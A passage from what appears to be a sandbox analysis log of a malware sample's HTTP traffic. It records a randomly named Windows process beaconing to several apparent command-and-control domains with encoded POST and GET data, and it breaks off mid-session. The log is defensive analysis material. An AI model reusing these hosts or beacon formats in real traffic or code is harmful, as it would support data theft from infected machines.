                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        9 | 192.168.2.22 | 49170 | 154.23.184.240 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:09:57.435573101 CEST | 453 | OUT | GET /p39s/?th=XXRlJ2&OlTXe=1N9NMDNpm9Czos0vDrs0jP0yJ99w59mrSL4zw6nNIeZI+vV5F9OeHegmPR72METQIT3pI5KWWCEpjpCMjPRQtKE/9BfJGlSqJeHxtl2Ce1Gg34KYTx0FEqSEiFH5 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.hm62t.top
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:09:58.324760914 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:09:58 GMT
                                        Content-Type: text/html
                                        Content-Length: 148
                                        Connection: close
                                        ETag: "66a8e223-94"
                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        10 | 192.168.2.22 | 49171 | 85.159.66.93 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:10:03.372596979 CEST | 2472 | OUT | POST /k2vl/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.golbasi-nakliyat.xyz
                                        Origin: http://www.golbasi-nakliyat.xyz
                                        Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 2162
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 42 64 4e 6f 46 47 67 61 57 66 47 6e 31 48 4a 2b 6b 46 45 76 41 57 31 46 61 31 75 65 66 31 61 58 4e 31 44 6d 6a 74 35 70 35 6e 37 68 71 44 79 32 52 35 66 45 2f 63 72 6f 48 76 79 61 44 59 53 54 4f 62 72 56 42 4c 39 71 56 59 51 62 51 50 45 62 30 79 6f 5a 33 4b 53 78 52 71 73 2f 34 31 59 6e 56 43 70 76 4c 33 4d 54 51 51 37 6f 49 62 4d 73 45 54 5a 41 43 74 78 72 50 69 2f 75 6f 4e 4f 56 4c 53 33 42 44 69 34 59 2f 63 68 4f 64 39 61 6a 61 63 31 55 2b 77 61 4e 52 79 41 7a 6c 77 45 75 55 43 79 2b 56 56 71 59 55 79 43 65 4c 51 76 43 7a 76 50 37 33 48 66 6c 66 6b 6f 63 6c 38 4c 65 55 51 4b 76 61 72 30 6c 31 79 6a 53 6b 54 56 48 4c 75 2b 49 67 36 64 38 44 55 58 31 65 71 32 6f 6c 73 41 54 4e 7a 45 67 44 64 34 46 32 78 46 78 49 39 59 6a 6a 2f 79 50 6b 31 4b 43 61 4d 37 47 73 45 6c 74 53 61 58 46 54 57 43 35 71 30 38 43 47 63 68 34 76 43 77 34 51 32 32 4b 67 44 5a 76 76 61 45 41 6d 6c 6b 7a 37 71 47 39 77 66 4b 4e 68 50 48 49 49 39 59 49 69 56 4d 62 77 67 52 41 [TRUNCATED]
                                        Data Ascii: OlTXe= [TRUNCATED]
                                        Sep 11, 2024 10:10:03.377585888 CEST | 236 | OUT | Data Raw: 51 45 4e 6a 44 54 31 31 6d 2f 79 5a 32 4d 36 31 35 4d 6e 66 2b 43 49 4f 46 54 47 79 52 2f 41 43 7a 75 68 73 52 38 58 58 38 79 43 4c 57 2b 5a 4c 42 42 6e 43 7a 34 48 62 57 6c 73 32 38 62 6c 76 33 33 74 2b 70 63 31 62 66 4d 75 33 79 6b 51 2f 4f 72
                                        Data Ascii: QENjDT11m/yZ2M615Mnf+CIOFTGyR/ACzuhsR8XX8yCLW+ZLBBnCz4HbWls28blv33t+pc1bfMu3ykQ/OrUenv1CNAMq+5a/g+Oaz6UUKPX6dWBrtTTeHstA2cACvlmf9PtiwXQ2wemy8j4zaVAnzWKwxi2lh78ICGN0dQ3bZCW1xCXi/UaP+5Ot0HPd8WVPiscfgXyWPbcKBpFmfKcukdngaa0yRBRiUNTVFAxYPwT1


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        11 | 192.168.2.22 | 49172 | 85.159.66.93 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:10:05.924834013 CEST | 747 | OUT | POST /k2vl/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.golbasi-nakliyat.xyz
                                        Origin: http://www.golbasi-nakliyat.xyz
                                        Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 202
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 42 65 6c 6f 46 53 4d 61 56 2f 47 6e 32 48 4a 2b 75 6c 45 70 41 52 39 4e 61 78 32 4f 66 43 47 58 4f 6e 62 6d 6a 66 42 70 36 6e 37 6d 34 6a 79 79 4d 70 66 56 2f 63 71 37 48 76 2b 61 44 59 47 54 63 70 54 56 57 61 39 74 64 49 51 5a 59 76 46 63 30 79 55 69 33 4b 65 68 52 71 55 2f 34 7a 51 6e 55 43 35 76 4e 56 55 54 56 67 37 75 41 37 4d 33 45 54 56 56 43 74 42 6a 50 69 72 75 70 38 53 56 4c 6a 58 42 48 78 51 59 78 38 68 44 48 74 62 64 58 2b 35 5a 37 42 76 44 59 53 55 51 69 42 59 73 66 77 4b 5a 55 6e 2b 44 61 79 65 43 4c 31 48 58 35 74 6d 30 6f 67 3d 3d
                                        Data Ascii: OlTXe=ezGJx9beP/VwBeloFSMaV/Gn2HJ+ulEpAR9Nax2OfCGXOnbmjfBp6n7m4jyyMpfV/cq7Hv+aDYGTcpTVWa9tdIQZYvFc0yUi3KehRqU/4zQnUC5vNVUTVg7uA7M3ETVVCtBjPirup8SVLjXBHxQYx8hDHtbdX+5Z7BvDYSUQiBYsfwKZUn+DayeCL1HX5tm0og==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        12 | 192.168.2.22 | 49173 | 85.159.66.93 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:10:08.475744009 CEST | 2472 | OUT | POST /k2vl/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.golbasi-nakliyat.xyz
                                        Origin: http://www.golbasi-nakliyat.xyz
                                        Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 3626
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 41 2b 56 6f 48 31 59 61 41 76 47 67 36 6e 4a 2b 6b 46 45 74 41 57 31 4e 61 31 75 65 66 78 71 58 4e 77 58 6d 69 39 35 70 34 6e 37 6d 78 44 79 32 52 35 66 44 2f 63 75 33 48 76 4f 77 44 62 71 54 4f 61 72 56 42 4d 52 71 53 59 51 62 53 50 46 64 30 79 55 53 33 4b 4f 74 52 71 41 47 34 7a 59 6e 55 77 52 76 49 6c 55 55 4a 51 37 75 41 37 4d 42 45 54 56 31 43 74 6f 6d 50 6d 76 45 6f 4b 32 56 4c 43 33 42 55 69 34 62 7a 38 68 48 5a 39 61 68 61 63 34 6d 2b 77 62 46 52 79 55 4a 6c 77 59 75 55 58 2b 2b 56 55 71 66 62 43 43 5a 48 41 76 43 73 66 50 35 33 48 65 6d 66 6b 6f 63 6c 39 33 65 58 67 4b 76 61 71 30 6d 71 69 6a 53 70 7a 56 61 57 2b 37 78 67 36 5a 53 44 56 6d 41 65 59 61 6f 6d 76 34 54 49 44 45 67 53 64 34 48 32 78 46 34 43 64 5a 4b 6a 2f 71 74 6b 78 76 5a 61 4d 37 47 73 47 74 74 46 35 2f 46 61 6d 43 35 68 55 38 44 50 38 67 4b 76 43 31 64 51 7a 4b 4b 67 43 42 76 75 74 34 41 6b 67 49 38 7a 36 47 38 36 2f 4b 44 73 76 48 64 49 39 45 79 69 56 31 2b 77 68 68 41 [TRUNCATED]
                                        Data Ascii: OlTXe=ezGJx9beP/VwA+VoH1YaAvGg6nJ+kFEtAW1Na1uefxqXNwXmi95p4n7mxDy2R5fD/cu3HvOwDbqTOarVBMRqSYQbSPFd0yUS3KOtRqAG4zYnUwRvIlUUJQ7uA7MBETV1CtomPmvEoK2VLC3BUi4bz8hHZ9ahac4m+wbFRyUJlwYuUX++VUqfbCCZHAvCsfP53Hemfkocl93eXgKvaq0mqijSpzVaW+7xg6ZSDVmAeYaomv4TIDEgSd4H2xF4CdZKj/qtkxvZaM7GsGttF5/FamC5hU8DP8gKvC1dQzKKgCBvut4AkgI8z6G86/KDsvHdI9EyiV1+whhAruMgWBY8/FLVSXqzu3viE8qaqG1QFuT5JYjKVWCvdNZxYUbbdfyP+bla8+akOlE3jEZWlyQSvP8NhOu3d1zFZNl9LCoOcAoy65aYwohJBMts4BnK9kmpHmC2ZTHHtmJVyVNqxcnmnZ7d58OMYf2BUXNa+EmaMSsVhruVvR3tgBnzwQ1wocM4N08Z/WEup6kfo8V1JHDSoEFPsCJVfa4O2WOnS3NnsJRRrHBN1cleuNRvRguER/EXJ44OGCPrYbRN+gf6HLQ//UZOWVCAdFrDw6YmQ2/Wi50onxD9YO03oPp1izUiNcp7XSDJurhhgXdLgQSXKpe1/PePzV+x0M5j3+v+GuZFtrpGU1QqmalU7V8H0lzfvkddq9SKBMWyH9JKdgF08S8uaxY1ZR+cgsDTUGG+pU5GKKzjSovrUbQZy0ScL4leBczegi+I9ox81Xu6ZGkfykUIasnxHM/CKdut0vNLT8Uyml3Q7EfwhnJlYP20SHOdZdYSFsNNhEoRkTsPhhmmhcy4GRsjiENCq8jrBL2jby9qVfVs6b1wSQKuYHNZQTRWBA+GcKae4jkQTvWQ0Lp+bjQIKZQLrU8g5GGFxi9ZYrC5EzU3+P1IR1aOfhz1PJ4eI7xdBbSeNKZmTsJGRrYJCO0Jb423U5rP3YU0N3QHauNhgax0aI [TRUNCATED]
                                        Sep 11, 2024 10:10:08.480945110 CEST | 1700 | OUT | Data Raw: 51 45 4d 63 44 54 70 31 6d 37 57 5a 32 4f 79 31 34 38 6e 59 78 53 49 4c 4d 7a 47 31 66 66 41 57 7a 75 68 43 52 39 4b 79 38 77 4f 4c 57 4c 64 4c 4c 51 6e 43 7a 49 48 64 63 46 74 79 33 36 5a 48 33 33 52 71 70 64 70 68 65 38 4f 33 67 6e 34 2f 63 74
                                        Data Ascii: QEMcDTp1m7WZ2Oy148nYxSILMzG1ffAWzuhCR9Ky8wOLWLdLLQnCzIHdcFty36ZH33Rqpdphe8O3gn4/ctAe0/1HMAMd+5XYg++wz495K9z6fmBrgwrZMMtGxcAPvlm39MNmwXN7wbKy8gQzYlAo6GK28C3gh7gtCGVWdQnbZAS1wjni8UaP85Pn5nPEz2RMisJb5BuWFOMjGZ9qT7o0qMrkY78BaiNsB7T0aF8ICG+hxgxAjGL


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        13 | 192.168.2.22 | 49174 | 85.159.66.93 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:10:11.019891977 CEST | 464 | OUT | GET /k2vl/?OlTXe=TxupyKnRMohPPcJUOS0MXPimpk4F304dGmgAGE+PRAnDIVDTmPtylWW9xTGIc+3DzvKXbunYVpmmYdbvcJ53VYYaSs8c8gEur6KMZZBX2lUDNg59LBcCd3WrENlZ&th=XXRlJ2 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.golbasi-nakliyat.xyz
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:10:11.711606026 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.14.1
                                        Date: Wed, 11 Sep 2024 08:10:11 GMT
                                        Content-Length: 0
                                        Connection: close
                                        X-Rate-Limit-Limit: 5s
                                        X-Rate-Limit-Remaining: 19
                                        X-Rate-Limit-Reset: 2024-09-11T08:10:16.6015079Z


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        14 | 192.168.2.22 | 49175 | 185.173.111.76 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:10:16.766618967 CEST | 2472 | OUT | POST /lwt6/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.mfgamecompany.shop
                                        Origin: http://www.mfgamecompany.shop
                                        Referer: http://www.mfgamecompany.shop/lwt6/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 2162
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 4a 4a 55 5a 79 41 37 67 33 65 57 53 31 78 79 55 76 33 5a 74 30 2b 37 6e 50 78 6b 42 2b 4a 6c 45 6a 46 34 37 61 57 74 7a 47 2b 72 54 68 34 61 76 57 31 42 72 2f 36 76 65 44 4d 65 46 44 7a 65 6b 47 61 5a 37 43 4b 52 30 47 6d 34 32 78 47 44 32 44 66 49 67 37 6c 67 54 66 4d 4b 4f 42 57 35 50 4b 6e 62 4c 56 66 4a 67 4b 66 70 67 6e 51 54 73 66 68 6e 42 35 6e 62 72 4b 75 34 33 43 43 69 31 56 73 46 68 47 70 4c 61 64 37 50 34 6b 70 58 4c 64 48 6e 48 69 57 6c 53 73 72 4b 2b 43 38 63 39 7a 38 69 74 74 6f 72 5a 4e 67 78 5a 65 46 65 30 34 48 50 34 49 51 2f 50 53 56 5a 39 30 73 75 55 46 4e 54 68 59 65 39 37 51 35 32 30 53 76 4b 75 50 70 36 6f 43 30 4b 2f 62 6a 75 4e 42 68 4d 46 47 31 4f 77 68 76 67 4e 70 6e 4a 38 49 56 74 78 66 49 30 55 49 56 52 51 6e 47 4d 36 51 30 48 77 73 4b 53 30 2f 61 6b 4e 35 63 67 37 58 53 77 2f 79 62 32 31 67 39 58 57 2f 33 6d 31 76 37 75 45 75 6b 4e 63 77 45 61 77 4e 6c 6a 33 6a 56 52 71 33 2f 42 36 2f 73 49 79 51 6e 4b 4a 4d 2b 72 67 [TRUNCATED]
                                        Data Ascii: OlTXe= [TRUNCATED]
                                        Sep 11, 2024 10:10:16.775419950 CEST | 230 | OUT | Data Raw: 49 47 78 34 75 5a 55 46 72 52 39 32 69 6d 62 4b 48 6e 50 35 38 71 50 7a 45 6b 49 4d 4d 36 48 79 6c 56 79 50 33 66 37 6f 6a 4a 74 49 6a 67 44 58 62 42 69 54 58 4c 2b 31 6a 74 66 6a 38 49 4c 39 56 71 38 6e 55 36 78 51 36 32 70 4a 77 75 4e 47 41 6b
                                        Data Ascii: IGx4uZUFrR92imbKHnP58qPzEkIMM6HylVyP3f7ojJtIjgDXbBiTXL+1jtfj8IL9Vq8nU6xQ62pJwuNGAkk6gXlW5cyTMMaCPvq4addK0Gu36R71P5if1T3C/ula6bOEx6iH3Wu/Cvc3QzFdY3q1bg94SuvrnheCxEeSDg5M+RwnK12KdIb2/WDoqPKRyG81ULUZOAlCExCtxE50gH14oS302xiyA9csGNteiS
                                        Sep 11, 2024 10:10:17.453175068 CEST | 1086 | IN | HTTP/1.1 301 Moved Permanently
                                        Connection: close
                                        content-type: text/html
                                        content-length: 795
                                        date: Wed, 11 Sep 2024 08:10:17 GMT
                                        server: LiteSpeed
                                        location: https://www.mfgamecompany.shop/lwt6/
                                        platform: hostinger
                                        panel: hpanel
                                        content-security-policy: upgrade-insecure-requests
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        15 | 192.168.2.22 | 49176 | 185.173.111.76 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:10:19.318605900 CEST | 741 | OUT | POST /lwt6/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.mfgamecompany.shop
                                        Origin: http://www.mfgamecompany.shop
                                        Referer: http://www.mfgamecompany.shop/lwt6/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 202
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 4a 4f 41 5a 7a 55 76 67 78 4f 57 53 34 52 79 55 31 48 59 6f 30 2f 48 52 50 31 38 52 39 34 68 45 6a 51 63 37 61 6c 46 7a 54 2b 72 51 35 49 62 6b 53 31 42 45 2f 36 76 6f 44 4f 61 46 44 33 32 6b 48 2f 56 37 53 2b 6c 37 46 57 34 30 34 6d 44 31 44 66 45 54 37 6b 63 44 66 4d 69 4f 42 51 35 50 4c 6e 4c 4c 52 36 39 67 4f 76 70 6d 76 77 53 75 66 68 71 62 35 6e 4c 7a 4b 75 6f 33 42 77 47 31 4d 64 6c 68 44 36 6a 61 55 62 50 35 77 5a 57 6b 54 47 4f 57 76 6b 31 64 75 4e 32 47 50 39 73 34 33 74 47 6a 6c 4b 58 48 42 54 46 6a 57 51 66 48 78 55 32 4b 65 67 3d 3d
                                        Data Ascii: OlTXe=u91ZDexvlNKHJOAZzUvgxOWS4RyU1HYo0/HRP18R94hEjQc7alFzT+rQ5IbkS1BE/6voDOaFD32kH/V7S+l7FW404mD1DfET7kcDfMiOBQ5PLnLLR69gOvpmvwSufhqb5nLzKuo3BwG1MdlhD6jaUbP5wZWkTGOWvk1duN2GP9s43tGjlKXHBTFjWQfHxU2Keg==
                                        Sep 11, 2024 10:10:19.979223967 CEST | 1086 | IN | HTTP/1.1 301 Moved Permanently
                                        Connection: close
                                        content-type: text/html
                                        content-length: 795
                                        date: Wed, 11 Sep 2024 08:10:19 GMT
                                        server: LiteSpeed
                                        location: https://www.mfgamecompany.shop/lwt6/
                                        platform: hostinger
                                        panel: hpanel
                                        content-security-policy: upgrade-insecure-requests
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        16 | 192.168.2.22 | 49177 | 185.173.111.76 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:10:21.862953901 CEST | 2472 | OUT | POST /lwt6/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.mfgamecompany.shop
                                        Origin: http://www.mfgamecompany.shop
                                        Referer: http://www.mfgamecompany.shop/lwt6/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 3626
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
